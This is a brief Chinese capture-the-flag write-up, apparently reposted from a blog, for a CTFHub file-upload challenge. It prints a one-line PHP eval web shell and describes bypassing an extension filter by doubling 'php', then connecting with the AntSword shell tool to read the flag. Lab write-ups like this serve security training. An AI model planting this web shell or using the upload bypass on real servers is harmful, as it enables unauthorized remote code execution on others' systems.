0


CTFHUB-文件上传-双写绕过

开启题目

1.php内容:
<?php @eval($_POST[cmd]);?>

上传一句话木马 1.php,抓包,双写 php

然后放包,上传成功

蚁剑连接

在“/var/www/html/flag_484225427.php”找到了 flag


本文转载自: https://blog.csdn.net/weixin_68416970/article/details/140858120
版权归原作者 燕雀安知鸿鹄之志哉. 所有, 如有侵权,请联系我们删除。

“CTFHUB-文件上传-双写绕过”的评论:

还没有评论